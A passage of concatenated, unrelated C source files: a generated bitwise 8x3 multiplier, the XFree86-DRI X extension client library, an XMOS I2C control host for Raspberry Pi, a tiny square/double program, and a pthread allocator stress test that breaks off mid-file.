uint64_t mul8x3u_0KE(const uint64_t A,const uint64_t B)
{
uint64_t dout_11, dout_12, dout_13, dout_14, dout_15, dout_16, dout_17, dout_18, dout_19, dout_20, dout_21, dout_22, dout_23, dout_24, dout_25, dout_26, dout_27, dout_28, dout_29, dout_30, dout_31, dout_32, dout_33, dout_34, dout_35, dout_36, dout_37, dout_38, dout_39, dout_40, dout_41, dout_42, dout_43, dout_44, dout_45, dout_46, dout_47, dout_48, dout_49, dout_50, dout_51, dout_52, dout_53, dout_54, dout_55, dout_56, dout_57, dout_58, dout_59, dout_60, dout_61, dout_62, dout_63, dout_64, dout_65, dout_66, dout_67, dout_68, dout_69, dout_70, dout_71, dout_72, dout_73, dout_74, dout_75, dout_76, dout_77, dout_78, dout_79, dout_80, dout_81, dout_82, dout_83, dout_84, dout_85, dout_86, dout_87, dout_88, dout_89, dout_90, dout_91, dout_92, dout_93, dout_94, dout_95, dout_96, dout_97, dout_98, dout_99, dout_100, dout_101, dout_102, dout_103, dout_104, dout_105;
uint64_t O;
dout_11=((A >> 0)&1)&((B >> 0)&1);
dout_12=((A >> 1)&1)&((B >> 0)&1);
dout_13=((A >> 2)&1)&((B >> 0)&1);
dout_14=((A >> 3)&1)&((B >> 0)&1);
dout_15=((A >> 4)&1)&((B >> 0)&1);
dout_16=((A >> 5)&1)&((B >> 0)&1);
dout_17=((A >> 6)&1)&((B >> 0)&1);
dout_18=((A >> 7)&1)&((B >> 0)&1);
dout_19=((A >> 0)&1)&((B >> 1)&1);
dout_20=((A >> 1)&1)&((B >> 1)&1);
dout_21=((A >> 2)&1)&((B >> 1)&1);
dout_22=((A >> 3)&1)&((B >> 1)&1);
dout_23=((A >> 4)&1)&((B >> 1)&1);
dout_24=((A >> 5)&1)&((B >> 1)&1);
dout_25=((A >> 6)&1)&((B >> 1)&1);
dout_26=((A >> 7)&1)&((B >> 1)&1);
dout_27=dout_12&dout_19;
dout_28=dout_12^dout_19;
dout_29=dout_13^dout_20;
dout_30=dout_13&dout_20;
dout_31=((B >> 1)&1)&dout_27;
dout_32=dout_29^dout_27;
dout_33=dout_30|dout_31;
dout_34=dout_14^dout_21;
dout_35=dout_14&dout_21;
dout_36=dout_34&dout_33;
dout_37=dout_34^dout_33;
dout_38=dout_35|dout_36;
dout_39=dout_15^dout_22;
dout_40=dout_15&dout_22;
dout_41=dout_39&dout_38;
dout_42=dout_39^dout_38;
dout_43=dout_40|dout_41;
dout_44=dout_16^dout_23;
dout_45=dout_16&dout_23;
dout_46=dout_44&dout_43;
dout_47=dout_44^dout_43;
dout_48=dout_45|dout_46;
dout_49=dout_17^dout_24;
dout_50=dout_17&dout_24;
dout_51=dout_49&dout_48;
dout_52=dout_49^dout_48;
dout_53=dout_50|dout_51;
dout_54=dout_18^dout_25;
dout_55=dout_18&dout_25;
dout_56=dout_54&dout_53;
dout_57=dout_54^dout_53;
dout_58=dout_55|dout_56;
dout_59=dout_58&dout_26;
dout_60=dout_58^dout_26;
dout_61=((A >> 0)&1)&((B >> 2)&1);
dout_62=((A >> 1)&1)&((B >> 2)&1);
dout_63=((A >> 2)&1)&((B >> 2)&1);
dout_64=((A >> 3)&1)&((B >> 2)&1);
dout_65=((A >> 4)&1)&((B >> 2)&1);
dout_66=((A >> 5)&1)&((B >> 2)&1);
dout_67=((A >> 6)&1)&((B >> 2)&1);
dout_68=((A >> 7)&1)&((B >> 2)&1);
dout_69=dout_32&dout_61;
dout_70=dout_32^dout_61;
dout_71=dout_37^dout_62;
dout_72=dout_37&dout_62;
dout_73=dout_71&dout_69;
dout_74=dout_71^dout_69;
dout_75=dout_72|dout_73;
dout_76=dout_42^dout_63;
dout_77=dout_42&dout_63;
dout_78=dout_76&dout_75;
dout_79=dout_76^dout_75;
dout_80=dout_77|dout_78;
dout_81=dout_47^dout_64;
dout_82=dout_47&dout_64;
dout_83=dout_81&dout_80;
dout_84=dout_81^dout_80;
dout_85=dout_82|dout_83;
dout_86=dout_52^dout_65;
dout_87=dout_52&dout_65;
dout_88=dout_86&dout_85;
dout_89=dout_86^dout_85;
dout_90=dout_87|dout_88;
dout_91=dout_57^dout_66;
dout_92=dout_57&dout_66;
dout_93=dout_91&dout_90;
dout_94=dout_91^dout_90;
dout_95=dout_92|dout_93;
dout_96=dout_60^dout_67;
dout_97=dout_60&dout_67;
dout_98=dout_96&dout_95;
dout_99=dout_96^dout_95;
dout_100=dout_97|dout_98;
dout_101=dout_59^dout_68;
dout_102=dout_59&dout_68;
dout_103=dout_101&dout_100;
dout_104=dout_101^dout_100;
dout_105=dout_102|dout_103;
O = 0;
O |= (dout_11&1) << 0;
O |= (dout_28&1) << 1;
O |= (dout_70&1) << 2;
O |= (dout_74&1) << 3;
O |= (dout_79&1) << 4;
O |= (dout_84&1) << 5;
O |= (dout_89&1) << 6;
O |= (dout_94&1) << 7;
O |= (dout_99&1) << 8;
O |= (dout_104&1) << 9;
O |= (dout_105&1) << 10;
return O;
}
|
the_stack_data/115765548.c | /**************************************************************************
Copyright 1998-1999 Precision Insight, Inc., Cedar Park, Texas.
Copyright 2000 VA Linux Systems, Inc.
All Rights Reserved.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sub license, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice (including the
next paragraph) shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT.
IN NO EVENT SHALL PRECISION INSIGHT AND/OR ITS SUPPLIERS BE LIABLE FOR
ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
**************************************************************************/
/*
* Authors:
* Kevin E. Martin <[email protected]>
* Jens Owen <[email protected]>
* Rickard E. (Rik) Faith <[email protected]>
*
*/
/* THIS IS NOT AN X CONSORTIUM STANDARD */
#if defined(GLX_DIRECT_RENDERING) && !defined(GLX_USE_APPLEGL)
#include <X11/Xlibint.h>
#include <X11/Xfuncproto.h>
#include <X11/extensions/Xext.h>
#include <X11/extensions/extutil.h>
#include "xf86dristr.h"
static XExtensionInfo _xf86dri_info_data;
static XExtensionInfo *xf86dri_info = &_xf86dri_info_data;
static char xf86dri_extension_name[] = XF86DRINAME;
#define XF86DRICheckExtension(dpy,i,val) \
XextCheckExtension (dpy, i, xf86dri_extension_name, val)
/*****************************************************************************
* *
* private utility routines *
* *
*****************************************************************************/
static int close_display(Display * dpy, XExtCodes * extCodes);
static /* const */ XExtensionHooks xf86dri_extension_hooks = {
NULL, /* create_gc */
NULL, /* copy_gc */
NULL, /* flush_gc */
NULL, /* free_gc */
NULL, /* create_font */
NULL, /* free_font */
close_display, /* close_display */
NULL, /* wire_to_event */
NULL, /* event_to_wire */
NULL, /* error */
NULL, /* error_string */
};
static
XEXT_GENERATE_FIND_DISPLAY(find_display, xf86dri_info,
xf86dri_extension_name,
&xf86dri_extension_hooks, 0, NULL)
static
XEXT_GENERATE_CLOSE_DISPLAY(close_display, xf86dri_info)
/*****************************************************************************
* *
* public XFree86-DRI Extension routines *
* *
*****************************************************************************/
#if 0
#include <stdio.h>
#define TRACE(msg) fprintf(stderr,"XF86DRI%s\n", msg);
#else
#define TRACE(msg)
#endif
Bool
XF86DRIQueryExtension(Display * dpy, int *event_basep,
int *error_basep)
{
XExtDisplayInfo *info = find_display(dpy);
TRACE("QueryExtension...");
if (XextHasExtension(info)) {
*event_basep = info->codes->first_event;
*error_basep = info->codes->first_error;
TRACE("QueryExtension... return True");
return True;
}
else {
TRACE("QueryExtension... return False");
return False;
}
}
Bool
XF86DRIQueryVersion(Display * dpy, int *majorVersion, int *minorVersion,
int *patchVersion)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIQueryVersionReply rep;
xXF86DRIQueryVersionReq *req;
TRACE("QueryVersion...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRIQueryVersion, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIQueryVersion;
if (!_XReply(dpy, (xReply *) & rep, 0, xFalse)) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("QueryVersion... return False");
return False;
}
*majorVersion = rep.majorVersion;
*minorVersion = rep.minorVersion;
*patchVersion = rep.patchVersion;
UnlockDisplay(dpy);
SyncHandle();
TRACE("QueryVersion... return True");
return True;
}
Bool
XF86DRIQueryDirectRenderingCapable(Display * dpy, int screen,
Bool * isCapable)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIQueryDirectRenderingCapableReply rep;
xXF86DRIQueryDirectRenderingCapableReq *req;
TRACE("QueryDirectRenderingCapable...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRIQueryDirectRenderingCapable, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIQueryDirectRenderingCapable;
req->screen = screen;
if (!_XReply(dpy, (xReply *) & rep, 0, xFalse)) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("QueryDirectRenderingCapable... return False");
return False;
}
*isCapable = rep.isCapable;
UnlockDisplay(dpy);
SyncHandle();
TRACE("QueryDirectRenderingCapable... return True");
return True;
}
Bool
XF86DRIOpenConnection(Display * dpy, int screen, drm_handle_t * hSAREA,
char **busIdString)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIOpenConnectionReply rep;
xXF86DRIOpenConnectionReq *req;
TRACE("OpenConnection...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRIOpenConnection, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIOpenConnection;
req->screen = screen;
if (!_XReply(dpy, (xReply *) & rep, 0, xFalse)) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("OpenConnection... return False");
return False;
}
*hSAREA = rep.hSAREALow;
if (sizeof(drm_handle_t) == 8) {
int shift = 32; /* var to prevent warning on next line */
*hSAREA |= ((drm_handle_t) rep.hSAREAHigh) << shift;
}
if (rep.length) {
if (!(*busIdString = (char *) Xcalloc(rep.busIdStringLength + 1, 1))) {
_XEatData(dpy, ((rep.busIdStringLength + 3) & ~3));
UnlockDisplay(dpy);
SyncHandle();
TRACE("OpenConnection... return False");
return False;
}
_XReadPad(dpy, *busIdString, rep.busIdStringLength);
}
else {
*busIdString = NULL;
}
UnlockDisplay(dpy);
SyncHandle();
TRACE("OpenConnection... return True");
return True;
}
Bool
XF86DRIAuthConnection(Display * dpy, int screen, drm_magic_t magic)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIAuthConnectionReq *req;
xXF86DRIAuthConnectionReply rep;
TRACE("AuthConnection...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRIAuthConnection, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIAuthConnection;
req->screen = screen;
req->magic = magic;
rep.authenticated = 0;
if (!_XReply(dpy, (xReply *) & rep, 0, xFalse) || !rep.authenticated) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("AuthConnection... return False");
return False;
}
UnlockDisplay(dpy);
SyncHandle();
TRACE("AuthConnection... return True");
return True;
}
Bool
XF86DRICloseConnection(Display * dpy, int screen)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRICloseConnectionReq *req;
TRACE("CloseConnection...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRICloseConnection, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRICloseConnection;
req->screen = screen;
UnlockDisplay(dpy);
SyncHandle();
TRACE("CloseConnection... return True");
return True;
}
Bool
XF86DRIGetClientDriverName(Display * dpy, int screen,
int *ddxDriverMajorVersion,
int *ddxDriverMinorVersion,
int *ddxDriverPatchVersion,
char **clientDriverName)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIGetClientDriverNameReply rep;
xXF86DRIGetClientDriverNameReq *req;
TRACE("GetClientDriverName...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRIGetClientDriverName, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIGetClientDriverName;
req->screen = screen;
if (!_XReply(dpy, (xReply *) & rep, 0, xFalse)) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetClientDriverName... return False");
return False;
}
*ddxDriverMajorVersion = rep.ddxDriverMajorVersion;
*ddxDriverMinorVersion = rep.ddxDriverMinorVersion;
*ddxDriverPatchVersion = rep.ddxDriverPatchVersion;
if (rep.length) {
if (!
(*clientDriverName =
(char *) Xcalloc(rep.clientDriverNameLength + 1, 1))) {
_XEatData(dpy, ((rep.clientDriverNameLength + 3) & ~3));
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetClientDriverName... return False");
return False;
}
_XReadPad(dpy, *clientDriverName, rep.clientDriverNameLength);
}
else {
*clientDriverName = NULL;
}
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetClientDriverName... return True");
return True;
}
Bool
XF86DRICreateContextWithConfig(Display * dpy, int screen, int configID,
XID * context, drm_context_t * hHWContext)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRICreateContextReply rep;
xXF86DRICreateContextReq *req;
TRACE("CreateContext...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRICreateContext, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRICreateContext;
req->visual = configID;
req->screen = screen;
*context = XAllocID(dpy);
req->context = *context;
if (!_XReply(dpy, (xReply *) & rep, 0, xFalse)) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("CreateContext... return False");
return False;
}
*hHWContext = rep.hHWContext;
UnlockDisplay(dpy);
SyncHandle();
TRACE("CreateContext... return True");
return True;
}
Bool
XF86DRICreateContext(Display * dpy, int screen, Visual * visual,
XID * context, drm_context_t * hHWContext)
{
return XF86DRICreateContextWithConfig(dpy, screen, visual->visualid,
context, hHWContext);
}
Bool
XF86DRIDestroyContext(Display * dpy, int screen, XID context)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIDestroyContextReq *req;
TRACE("DestroyContext...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRIDestroyContext, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIDestroyContext;
req->screen = screen;
req->context = context;
UnlockDisplay(dpy);
SyncHandle();
TRACE("DestroyContext... return True");
return True;
}
Bool
XF86DRICreateDrawable(Display * dpy, int screen,
XID drawable, drm_drawable_t * hHWDrawable)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRICreateDrawableReply rep;
xXF86DRICreateDrawableReq *req;
TRACE("CreateDrawable...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRICreateDrawable, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRICreateDrawable;
req->screen = screen;
req->drawable = drawable;
if (!_XReply(dpy, (xReply *) & rep, 0, xFalse)) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("CreateDrawable... return False");
return False;
}
*hHWDrawable = rep.hHWDrawable;
UnlockDisplay(dpy);
SyncHandle();
TRACE("CreateDrawable... return True");
return True;
}
static int
noopErrorHandler(Display * dpy, XErrorEvent * xerr)
{
return 0;
}
Bool
XF86DRIDestroyDrawable(Display * dpy, int screen, XID drawable)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIDestroyDrawableReq *req;
int (*oldXErrorHandler) (Display *, XErrorEvent *);
TRACE("DestroyDrawable...");
XF86DRICheckExtension(dpy, info, False);
/* This is called from the DRI driver, which used call it like this
*
* if (windowExists(drawable))
* destroyDrawable(drawable);
*
* which is a textbook race condition - the window may disappear
* from the server between checking for its existance and
* destroying it. Instead we change the semantics of
* __DRIinterfaceMethodsRec::destroyDrawable() to succeed even if
* the windows is gone, by wrapping the destroy call in an error
* handler. */
XSync(dpy, False);
oldXErrorHandler = XSetErrorHandler(noopErrorHandler);
LockDisplay(dpy);
GetReq(XF86DRIDestroyDrawable, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIDestroyDrawable;
req->screen = screen;
req->drawable = drawable;
UnlockDisplay(dpy);
SyncHandle();
XSetErrorHandler(oldXErrorHandler);
TRACE("DestroyDrawable... return True");
return True;
}
Bool
XF86DRIGetDrawableInfo(Display * dpy, int screen, Drawable drawable,
unsigned int *index, unsigned int *stamp,
int *X, int *Y, int *W, int *H,
int *numClipRects, drm_clip_rect_t ** pClipRects,
int *backX, int *backY,
int *numBackClipRects,
drm_clip_rect_t ** pBackClipRects)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIGetDrawableInfoReply rep;
xXF86DRIGetDrawableInfoReq *req;
int total_rects;
TRACE("GetDrawableInfo...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRIGetDrawableInfo, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIGetDrawableInfo;
req->screen = screen;
req->drawable = drawable;
if (!_XReply(dpy, (xReply *) & rep, 1, xFalse)) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetDrawableInfo... return False");
return False;
}
*index = rep.drawableTableIndex;
*stamp = rep.drawableTableStamp;
*X = (int) rep.drawableX;
*Y = (int) rep.drawableY;
*W = (int) rep.drawableWidth;
*H = (int) rep.drawableHeight;
*numClipRects = rep.numClipRects;
total_rects = *numClipRects;
*backX = rep.backX;
*backY = rep.backY;
*numBackClipRects = rep.numBackClipRects;
total_rects += *numBackClipRects;
#if 0
/* Because of the fix in Xserver/GL/dri/xf86dri.c, this check breaks
* backwards compatibility (Because of the >> 2 shift) but the fix
* enables multi-threaded apps to work.
*/
if (rep.length != ((((SIZEOF(xXF86DRIGetDrawableInfoReply) -
SIZEOF(xGenericReply) +
total_rects * sizeof(drm_clip_rect_t)) +
3) & ~3) >> 2)) {
_XEatData(dpy, rep.length);
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetDrawableInfo... return False");
return False;
}
#endif
if (*numClipRects) {
int len = sizeof(drm_clip_rect_t) * (*numClipRects);
*pClipRects = (drm_clip_rect_t *) Xcalloc(len, 1);
if (*pClipRects)
_XRead(dpy, (char *) *pClipRects, len);
}
else {
*pClipRects = NULL;
}
if (*numBackClipRects) {
int len = sizeof(drm_clip_rect_t) * (*numBackClipRects);
*pBackClipRects = (drm_clip_rect_t *) Xcalloc(len, 1);
if (*pBackClipRects)
_XRead(dpy, (char *) *pBackClipRects, len);
}
else {
*pBackClipRects = NULL;
}
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetDrawableInfo... return True");
return True;
}
Bool
XF86DRIGetDeviceInfo(Display * dpy, int screen, drm_handle_t * hFrameBuffer,
int *fbOrigin, int *fbSize, int *fbStride,
int *devPrivateSize, void **pDevPrivate)
{
XExtDisplayInfo *info = find_display(dpy);
xXF86DRIGetDeviceInfoReply rep;
xXF86DRIGetDeviceInfoReq *req;
TRACE("GetDeviceInfo...");
XF86DRICheckExtension(dpy, info, False);
LockDisplay(dpy);
GetReq(XF86DRIGetDeviceInfo, req);
req->reqType = info->codes->major_opcode;
req->driReqType = X_XF86DRIGetDeviceInfo;
req->screen = screen;
if (!_XReply(dpy, (xReply *) & rep, 0, xFalse)) {
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetDeviceInfo... return False");
return False;
}
*hFrameBuffer = rep.hFrameBufferLow;
if (sizeof(drm_handle_t) == 8) {
int shift = 32; /* var to prevent warning on next line */
*hFrameBuffer |= ((drm_handle_t) rep.hFrameBufferHigh) << shift;
}
*fbOrigin = rep.framebufferOrigin;
*fbSize = rep.framebufferSize;
*fbStride = rep.framebufferStride;
*devPrivateSize = rep.devPrivateSize;
if (rep.length) {
if (!(*pDevPrivate = (void *) Xcalloc(rep.devPrivateSize, 1))) {
_XEatData(dpy, ((rep.devPrivateSize + 3) & ~3));
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetDeviceInfo... return False");
return False;
}
_XRead(dpy, (char *) *pDevPrivate, rep.devPrivateSize);
}
else {
*pDevPrivate = NULL;
}
UnlockDisplay(dpy);
SyncHandle();
TRACE("GetDeviceInfo... return True");
return True;
}
Bool
XF86DRIOpenFullScreen(Display * dpy, int screen, Drawable drawable)
{
/* This function and the underlying X protocol are deprecated.
*/
(void) dpy;
(void) screen;
(void) drawable;
return False;
}
Bool
XF86DRICloseFullScreen(Display * dpy, int screen, Drawable drawable)
{
/* This function and the underlying X protocol are deprecated.
*/
(void) dpy;
(void) screen;
(void) drawable;
return True;
}
#endif /* GLX_DIRECT_RENDERING */
|
the_stack_data/107953111.c | // Copyright 2016-2021 XMOS LIMITED.
// This Software is subject to the terms of the XMOS Public Licence: Version 1.
#if USE_I2C && RPI
#include <stdio.h>
#include <stdlib.h>
#include <linux/i2c-dev.h>
#include <linux/i2c.h>
#include <fcntl.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include "device_control_host.h"
#include "control_host_support.h"
#include "util.h"
//#define DBG(x) x
#define DBG(x)
/*Note there is an issue with RPI/Jessie where I2C repeated starts are not enabled by default.
Try the following at the bash command line to enable them:
sudo su -
echo -n 1 > /sys/module/i2c_bcm2708/parameters/combined
exit
*/
const char *devName = "/dev/i2c-1"; // Name of the i2c device we will be using
unsigned char address = 0xff; // Slave address. Initialise to invalid
int fd; // File descrition for i2c device
control_ret_t control_init_i2c(unsigned char i2c_slave_address)
{
// Previously this shifted the address down by 1(>>1)
// but this wasn't found to be necessary
address = i2c_slave_address;
if ((fd = open(devName, O_RDWR)) < 0) { // Open port for reading and writing
fprintf(stderr, "Failed to open i2c port: ");
perror( "" );
return CONTROL_ERROR;
}
if (ioctl(fd, I2C_SLAVE, address) < 0) { // Set the port options and set the address of the device we wish to speak to
fprintf(stderr, "Unable to set i2c configuration at address 0x%x: ", address);
perror( "" );
return CONTROL_ERROR;
}
DBG(printf("Configured to talk to i2c device at address 0x%x = (0x%x >> 1)\n", address, i2c_slave_address));
// This writes command zero to register zero. It is a workaround for RPI kernel 4.4 which seems to ignore the first data bytes otherwise
// It is a benign operation for lib_device_control as register zero, command zero is the version and is read only
unsigned char data[3];
control_build_i2c_data(data, 0, 0, data, 0);
write(fd, data, 3);
return CONTROL_SUCCESS;
}
static unsigned num_commands = 0;
control_ret_t
control_write_command(control_resid_t resid, control_cmd_t cmd,
const uint8_t payload[], size_t payload_len)
{
unsigned char buffer_to_send[I2C_TRANSACTION_MAX_BYTES + 3];
int len = control_build_i2c_data(buffer_to_send, resid, cmd, payload, payload_len);
DBG(printf("%u: send write command: ", num_commands));
DBG(print_bytes((unsigned char*)buffer_to_send, payload_len));
int written = write(fd, buffer_to_send, len);
if (written != len){
fprintf(stderr, "Error writing to i2c. %d of %d bytes sent\n", written, len);
return CONTROL_ERROR;
}
num_commands++;
return CONTROL_SUCCESS;
}
control_ret_t
control_read_command(control_resid_t resid, control_cmd_t cmd,
uint8_t payload[], size_t payload_len)
{
unsigned char read_hdr[I2C_TRANSACTION_MAX_BYTES];
unsigned len = control_build_i2c_data(read_hdr, resid, cmd, payload, payload_len);
if (len != 3){
fprintf(stderr, "Error building read command section of read_device. len should be 3 but is %d\n", len);
return CONTROL_ERROR;
}
// Do a repeated start (write followed by read with no stop bit)
struct i2c_msg rdwr_msgs[2] = {
{ // Start address
.addr = address,
.flags = 0, // write
.len = (unsigned short)len, //will be 3
.buf = read_hdr
},
{ // Read buffer
.addr = address,
.flags = I2C_M_RD, // read
.len = (unsigned short)payload_len,
.buf = payload
}
};
struct i2c_rdwr_ioctl_data rdwr_data = {
.msgs = rdwr_msgs,
.nmsgs = 2
};
DBG(printf("%d: issued command to read %d bytes: command=", num_commands, payload_len));
DBG(print_bytes((unsigned char*)read_hdr, len));
int errno = ioctl( fd, I2C_RDWR, &rdwr_data );
if ( errno < 0 ) {
fprintf(stderr, "rdwr ioctl error %d: ", errno );
perror( "" );
return CONTROL_ERROR;
}
DBG(printf("read command received: "));
DBG(print_bytes(payload, payload_len));
num_commands++;
return CONTROL_SUCCESS;
}
control_ret_t control_cleanup_i2c(void)
{
close(fd);
return CONTROL_SUCCESS;
}
#endif // USE_I2C
|
the_stack_data/103855.c | #include <stdio.h>
int main()
{
int num;
printf("digite um numero: \n");
scanf("%d", &num);
int doble = num * 2;
int quadratic = num * num;
printf("Quadrado de %d é: %d\n", num, quadratic);
printf("Dobro de %d é: %d\n", num, doble);
return 0;
}
|
the_stack_data/45368.c | /* This code was donated by Matthew 'kinetik' Gregan. Thanks, Matthew. :) */
#include <sys/time.h>
#include <assert.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifndef EXIT_SUCCESS
#define EXIT_SUCCESS 0
#endif
#ifndef EXIT_FAILURE
#define EXIT_FAILURE 1
#endif
struct list_node
{
void * m;
struct list_node * n;
};
struct queue
{
struct list_node * h;
pthread_mutex_t m;
pthread_cond_t c_empty;
pthread_cond_t c_full;
int done;
};
struct task
{
void (*f)(struct task * t);
struct queue * q;
};
static pthread_barrier_t barrier;
static int g_threads;
static int g_size;
static int g_tasks;
static int g_loops;
static int g_debug;
static int g_touchmem;
#define debugprint(from, msg)
#if 0
static void
debugprint(const char * from, const char * msg)
{
if (g_debug)
fprintf(stderr, "%x: %s: %s\n", (unsigned int) pthread_self(), from, msg);
}
#endif
static void *
threadmain(void * v)
{
struct task * t = v;
int rc = pthread_barrier_wait(&barrier);
assert(rc == 0 || rc == PTHREAD_BARRIER_SERIAL_THREAD);
t->f(t);
return NULL;
}
static void
producer(struct task * t)
{
struct queue * q = t->q;
int tasks;
int loops;
struct list_node * node;
struct list_node * newnode;
struct timeval t1, t2, t3;
unsigned long long maxalloc = 0;
unsigned long long tmp;
for (loops = 0; loops < g_loops; ++loops)
{
assert(pthread_mutex_lock(&q->m) == 0);
while (q->h)
{
assert(pthread_cond_wait(&q->c_empty, &q->m) == 0);
if (q->h)
continue;
}
node = NULL;
tasks = g_tasks;
while (tasks--)
{
gettimeofday(&t1, NULL);
newnode = malloc(sizeof(*newnode));
newnode->m = malloc(g_size);
if (g_touchmem)
memset(newnode->m, '\1', g_size);
gettimeofday(&t2, NULL);
timersub(&t2, &t1, &t3);
tmp = t3.tv_sec;
tmp *= 1000000;
tmp += t3.tv_usec;
if (tmp > maxalloc)
maxalloc = tmp;
newnode->n = NULL;
if (!node)
{
node = newnode;
}
else
{
newnode->n = node;
node = newnode;
}
debugprint("producer", "creating chunk");
}
q->h = node;
debugprint("producer", "broadcast");
assert(pthread_mutex_unlock(&q->m) == 0);
assert(pthread_cond_signal(&q->c_full) == 0);
}
debugprint("producer", "done");
//fprintf(stderr, "producer: max alloc: %llu\n", maxalloc);
assert(pthread_mutex_lock(&q->m) == 0);
q->done = 1;
assert(pthread_mutex_unlock(&q->m) == 0);
assert(pthread_cond_signal(&q->c_full) == 0);
free(t);
}
static void
consumer(struct task * t)
{
struct queue * q = t->q;
int done = 0;
struct list_node * node;
struct list_node * oldnode;
struct timeval t1, t2, t3;
unsigned long long maxfree = 0;
unsigned long long tmp;
while (!done)
{
assert(pthread_mutex_lock(&q->m) == 0);
while (!q->h && !q->done)
{
assert(pthread_cond_wait(&q->c_full, &q->m) == 0);
if (!q->h && !q->done)
continue;
}
done = q->done;
node = q->h;
while (node)
{
debugprint("consumer", "processing chunk");
gettimeofday(&t1, NULL);
if (g_touchmem)
memset(node->m, '\2', g_size);
free(node->m);
gettimeofday(&t2, NULL);
timersub(&t2, &t1, &t3);
tmp = t3.tv_sec;
tmp *= 1000000;
tmp += t3.tv_usec;
if (tmp > maxfree)
maxfree = tmp;
oldnode = node;
node = node->n;
free(oldnode);
}
q->h = NULL;
debugprint("consumer", "broadcast");
assert(pthread_mutex_unlock(&q->m) == 0);
assert(pthread_cond_signal(&q->c_empty) == 0);
}
debugprint("consumer", "done");
//fprintf(stderr, "consumer: max free: %llu\n", maxfree);
q->h = NULL;
assert(pthread_cond_destroy(&q->c_empty) == 0);
assert(pthread_cond_destroy(&q->c_full) == 0);
assert(pthread_mutex_destroy(&q->m) == 0);
q->done = 0;
free(q);
t->q = NULL;
free(t);
}
static void
usage(char const * prog)
{
fprintf(stderr, "Usage: %s [-d] [-h] [-l loops] [-m] [-t threads] [-s allocsize] [-w work]\n", prog);
fprintf(stderr, "\nOptions:\n");
fprintf(stderr, "-d debug logging\n");
fprintf(stderr, "-h print usage\n");
fprintf(stderr, "-l loops producer loop iterations\n");
fprintf(stderr, "-m touch memory during allocations\n");
fprintf(stderr, "-t threads thread count (must be even)\n");
fprintf(stderr, "-s allocsize size of each work allocation\n");
fprintf(stderr, "-w work work units per loop iteration\n");
exit(EXIT_FAILURE);
}
int
main(int argc, char * argv[])
{
int i;
int opt;
pthread_t * tcbs;
struct timeval t1, t2, t3;
g_threads = 2;
g_size = 128;
g_tasks = 10;
g_loops = 1000;
while ((opt = getopt(argc, argv, "dhl:mt:s:w:")) != -1)
{
switch (opt)
{
case 'd':
g_debug = 1;
break;
case 'l':
g_loops = atoi(optarg);
break;
case 'm':
g_touchmem = 1;
break;
case 't':
g_threads = atoi(optarg);
break;
case 's':
g_size = atoi(optarg);
break;
